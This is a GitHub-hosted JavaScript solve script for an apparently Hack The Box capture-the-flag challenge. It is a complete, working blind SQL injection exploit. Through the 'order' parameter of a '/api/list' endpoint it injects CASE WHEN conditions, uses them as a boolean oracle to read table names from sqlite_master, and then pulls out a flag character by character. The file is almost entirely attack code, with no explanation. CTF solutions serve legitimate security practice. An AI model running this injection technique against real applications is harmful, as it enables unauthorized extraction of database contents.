-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathsolve.js
55 lines (41 loc) · 1.29 KB
/
solve.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/env node
const BASE_URL = `http://${process.argv[2]}`
const CHARS = `0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$?@_{}`
const oracle = async payload => {
const res = await fetch(`${BASE_URL}/api/list`, {
body: JSON.stringify({ order: `(CASE WHEN ${payload} THEN id ELSE count END)` }),
headers: { 'Content-Type': 'application/json' },
method: 'POST',
})
const data = await res.json()
return data[0].id === 1
}
const main = async () => {
let flagTableName = 'flag_'
while (flagTableName.length !== 15) {
for (let c of CHARS) {
if (await oracle(`(SELECT SUBSTR(tbl_name, ${flagTableName.length + 1}, 1) FROM sqlite_master WHERE tbl_name LIKE 'flag_%') = '${c}'`)) {
flagTableName += c
break
}
}
}
console.log('Flag table name:', flagTableName)
let flagLength = 1
while (await oracle(`(SELECT LENGTH(flag) FROM ${flagTableName}) != ${flagLength}`)) {
flagLength++
}
console.log(`Flag length: ${flagLength}`)
let flag = 'HTB{'
while (flag.length !== flagLength - 1) {
for (let c of CHARS) {
if (await oracle(`(SELECT SUBSTR(flag, ${flag.length + 1}, 1) FROM ${flagTableName}) = '${c}'`)) {
flag += c
break
}
}
}
flag += '}'
console.log('Flag:', flag)
}
main()